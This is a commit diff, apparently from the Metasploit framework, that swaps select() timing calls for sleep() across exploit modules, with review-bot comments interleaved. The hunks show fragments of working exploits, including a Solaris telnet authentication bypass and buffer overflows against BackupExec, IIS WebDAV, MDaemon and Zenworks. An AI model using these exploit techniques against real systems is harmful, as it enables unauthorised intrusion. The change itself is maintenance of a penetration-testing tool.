No more select(nil, nil, nil, X)
git-svn-id: file:///home/svn/incoming/trunk@3259 4d416f70-5f16-0410-b530-b9f4589650da
parent
c8d273cec0
commit
3fa5d999a2
|
@ -75,7 +75,6 @@ ARCH_TYPES =
|
||||||
ARCH_PPC,
|
ARCH_PPC,
|
||||||
ARCH_SPARC
|
ARCH_SPARC
|
||||||
]
|
]
|
||||||
ARCH_ALL = ARCH_TYPES
|
|
||||||
|
|
||||||
|
|
||||||
ARCH_CMD_UNIX = 'cmd_unix'
|
ARCH_CMD_UNIX = 'cmd_unix'
|
||||||
|
@ -87,3 +86,5 @@ ARCH_CMD =
|
||||||
ARCH_CMD_LINUX,
|
ARCH_CMD_LINUX,
|
||||||
ARCH_CMD_BSD
|
ARCH_CMD_BSD
|
||||||
]
|
]
|
||||||
|
|
||||||
|
ARCH_ALL = ARCH_TYPES + ARCH_CMD
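Review bot: The moved definition `ARCH_ALL = ARCH_TYPES + ARCH_CMD` widens the constant from CPU architectures only to CPU architectures plus the command types, and the commit message (about replacing `select` with `sleep`) does not mention it. Any caller that iterates ARCH_ALL expecting only CPU types would now also see entries such as `cmd_unix`; the callers are not visible on this page, so they are worth auditing. A comment above the line would make the new meaning explicit, for example `# ARCH_ALL covers CPU architectures and the command types in ARCH_CMD`. The definition must also stay below ARCH_CMD from now on, because it reads that constant at load time.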
|
||||||
|
|
|
@ -29,6 +29,8 @@ class Exploits::Solaris::Telnet::TTYPrompt_Auth_Bypass < Msf::Exploit::Remote
|
||||||
{
|
{
|
||||||
'Space' => 2000,
|
'Space' => 2000,
|
||||||
'BadChars' => "",
|
'BadChars' => "",
|
||||||
|
'MinNops' => 0,
|
||||||
|
'MaxNops' => 0,
|
||||||
},
|
},
|
||||||
'PayloadCompat' =>
|
'PayloadCompat' =>
|
||||||
{
|
{
|
||||||
|
@ -51,6 +53,9 @@ class Exploits::Solaris::Telnet::TTYPrompt_Auth_Bypass < Msf::Exploit::Remote
|
||||||
def exploit
|
def exploit
|
||||||
connect
|
connect
|
||||||
|
|
||||||
|
banner = sock.get_once
|
||||||
|
|
||||||
|
p banner
|
||||||
print_status("Setting TTYPROMPT...")
|
print_status("Setting TTYPROMPT...")
|
||||||
|
|
||||||
req =
|
req =
|
||||||
|
@ -69,10 +74,12 @@ class Exploits::Solaris::Telnet::TTYPrompt_Auth_Bypass < Msf::Exploit::Remote
|
||||||
"\xff\xf0"
|
"\xff\xf0"
|
||||||
|
|
||||||
sock.put(req)
|
sock.put(req)
|
||||||
|
sleep(0.25)
|
||||||
|
|
||||||
print_status("Sending username with 65 environment variables...")
|
print_status("Sending username with 65 environment variables...")
|
||||||
sock.put(datastore['USER'] + (" M" * 65) + "\n")
|
sock.put(datastore['USER'] + (" M" * 65) + "\n")
|
||||||
sock.put(payload.encoded)
|
sock.put(payload.encoded)
|
||||||
|
sleep(0.25)
|
||||||
|
|
||||||
handler
|
handler
|
||||||
disconnect
|
disconnect
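Review bot: The added `p banner` in `exploit` looks like leftover debugging: it writes the inspected value straight to stdout rather than through the module's output helper, and `banner` is not used anywhere else in the visible hunks. Either drop the line or route it through the helper already used in this method, e.g. `print_status("Banner: #{banner.inspect}")`, so the output follows the framework's UI handling. The banner read, the `MinNops`/`MaxNops` entries and the two `sleep(0.25)` calls are also unrelated to the stated select-to-sleep change and would be easier to review as a separate commit. The part of `exploit` that builds `req` lies between the hunks and is not shown.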
|
||||||
|
|
|
@ -100,7 +100,7 @@ class Exploits::Windows::Backupexec::BackupExecNSOverflow < Msf::Exploit::Remote
|
||||||
sock.put(payload.encoded)
|
sock.put(payload.encoded)
|
||||||
|
|
||||||
print_status("Waiting for the payload to execute...")
|
print_status("Waiting for the payload to execute...")
|
||||||
select(nil, nil, nil, 2)
|
sleep(2)
|
||||||
|
|
||||||
handler
|
handler
|
||||||
disconnect
|
disconnect
|
||||||
|
|
|
@ -110,7 +110,7 @@ class Exploits::Windows::Brightstor::BrightstorUniversalAgentOverflow < Msf::Exp
|
||||||
disconnect
|
disconnect
|
||||||
|
|
||||||
# Give the process time to recover from each exception
|
# Give the process time to recover from each exception
|
||||||
select(nil, nil, nil, 0.1);
|
sleep(0.1);
|
||||||
}
|
}
|
||||||
|
|
||||||
handler
|
handler
|
||||||
|
|
|
@ -140,7 +140,7 @@ class Exploits::Windows::Iis::MS03_007_WEBDAV_NTDLL < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
1.upto(8) { |i|
|
1.upto(8) { |i|
|
||||||
select(nil, nil, nil, 0.25)
|
sleep(0.25)
|
||||||
return if self.session_created?
|
return if self.session_created?
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
@ -155,7 +155,7 @@ class Exploits::Windows::Iis::MS03_007_WEBDAV_NTDLL < Msf::Exploit::Remote
|
||||||
connect
|
connect
|
||||||
rescue => e
|
rescue => e
|
||||||
print_status("Connection failed (#{i.to_s}/20)...")
|
print_status("Connection failed (#{i.to_s}/20)...")
|
||||||
select(nil, nil, nil, 2)
|
sleep(2)
|
||||||
next
|
next
|
||||||
end
|
end
|
||||||
return sock
|
return sock
|
||||||
|
|
|
@ -67,7 +67,7 @@ class Exploits::Windows::Imap::MDaemonImapCramMD5Overflow < Msf::Exploit::Remote
|
||||||
res = sock.get_once
|
res = sock.get_once
|
||||||
|
|
||||||
print_status("Received LOGOUT reply: #{res.chomp}")
|
print_status("Received LOGOUT reply: #{res.chomp}")
|
||||||
select(nil, nil, nil, 1)
|
sleep(1)
|
||||||
|
|
||||||
handler
|
handler
|
||||||
disconnect
|
disconnect
|
||||||
|
|
|
@ -83,7 +83,7 @@ class Exploits::Windows::Isapi::IIS_FP30REG_Chunked < Msf::Exploit::Remote
|
||||||
"0\r\n"
|
"0\r\n"
|
||||||
|
|
||||||
s.put(req)
|
s.put(req)
|
||||||
select(nil, nil, nil, 1)
|
sleep(1)
|
||||||
|
|
||||||
handler
|
handler
|
||||||
disconnect
|
disconnect
|
||||||
|
|
|
@ -73,7 +73,7 @@ class Exploits::Windows::Novell::ZenworksDesktopAgentOverflow < Msf::Exploit::Re
|
||||||
sock.put("\x00\x24" + ("A" * 0x20) + [ target.ret ].pack('V'))
|
sock.put("\x00\x24" + ("A" * 0x20) + [ target.ret ].pack('V'))
|
||||||
|
|
||||||
print_status("Overflow request sent, sleeping for four seconds")
|
print_status("Overflow request sent, sleeping for four seconds")
|
||||||
select(nil, nil, nil, 4)
|
sleep(4)
|
||||||
|
|
||||||
handler
|
handler
|
||||||
disconnect
|
disconnect
|
||||||
|
|